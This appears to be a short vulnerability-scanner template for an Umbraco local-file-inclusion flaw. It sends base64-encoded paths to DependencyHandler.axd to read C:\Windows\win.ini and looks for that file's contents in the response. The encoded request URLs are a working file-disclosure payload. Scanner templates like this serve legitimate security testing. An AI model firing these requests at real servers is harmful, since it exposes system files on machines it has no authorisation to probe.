id: umbraco-lfi
info:
  name: Umbraco LFI
  risk: High

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'umbraco'

variables:
 # C:\Windows\win.ini
  - file: |
      DependencyHandler.axd?s=QzpcV2luZG93c1x3aW4uaW5p&t=CSS&cdv=1
      DependencyHandler.axd?s=ZmlsZTovL2xvY2FsaG9zdC9jJC9XaW5kb3dzL3dpbi5pbmk=&t=3&cdv=1

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.file}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && (StringSearch("response", "[extensions]") || StringSearch("response", "[fonts]"))
